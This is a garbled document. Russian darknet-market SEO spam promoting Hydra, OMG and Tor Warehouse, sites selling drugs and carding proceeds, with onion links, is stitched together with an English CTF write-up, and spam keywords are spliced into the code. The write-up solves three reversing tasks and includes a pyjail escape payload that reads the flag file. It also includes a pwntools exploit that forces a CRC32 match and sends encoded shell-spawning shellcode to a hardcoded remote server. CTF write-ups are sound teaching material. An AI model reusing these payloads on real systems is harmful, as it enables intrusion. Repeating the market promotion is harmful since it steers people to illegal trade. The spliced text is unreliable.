шего в мире русскоязычного даркнет-рынка Hydra Market. Legal обзор судебной практики, решения судов, в том числе по России, Украине, США. Onion - Pasta аналог pastebin со словесными идентификаторами. После осуществления регистрации для большей анонимности сайт работает на оплате двумя способами - это киви и криптовалюта. Внезапно много русских пользователей. Onion - TorSearch, поиск внутри.onion. Настройка сайта Гидра. Начинание анончика, пожелаем ему всяческой удачи. Речь идёт о крупнейшей площадке для торговли наркотиками и крадеными данными. Покупателю остаются только выбрать "купить" и подтвердить покупку. Ссылку нашёл на клочке бумаги, лежавшем на скамейке. Первый способ попасть на тёмную сторону всемирной паутины использовать Тор браузер. Всегда свежая ОМГ! На тот момент ramp насчитывал 14 000 активных пользователей. Предложение от конкурентов под названием hola! Всегда читайте отзывы и будьте в курсе самого нового, иначе можно старь жертвой обмана. Пополнение баланса происходит так же как и на прежнем сайте, посредством покупки биткоинов и переводом их на свой кошелек в личном кабинете. Onion - Tor Metrics статистика всего TORа, посещение по странам, траффик, количество onion-сервисов wrhsa3z4n24yw7e2.onion - Tor Warehouse Как утверждают авторы - магазин купленного на доходы от кардинга и просто краденое. Ключевые слова: веб студия москва, создание сайта, продвижение Домен зарегистрирован: (13 лет назад) Домен действителен до: Регистратор домена: rucenter-REG-ripn Серверы имен: t t Яндекс ИКС: Индексация в Яндекс: 5 страниц IP сервера: Провайдер сервера: State Institute of Information Technologies and. Главная ссылка сайта Omgomg (работает в браузере Tor omgomgomg5j4yrr4mjdv3h5c5xfvxtqqs2in7smi65mjps7wvkmqmtqd.
This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.Reverse 100:#include <stdio.h>#include <string.h>int main() { char buf[64]; gets(buf); int l = strlen(buf); if (l * l!= 144) return 1; unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16); unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16); unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16); unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16); if (!(((a %
вход 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059)))) return 2; if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a.pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1)
онион if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait()
sprut else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside, bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if (!(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1), 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related
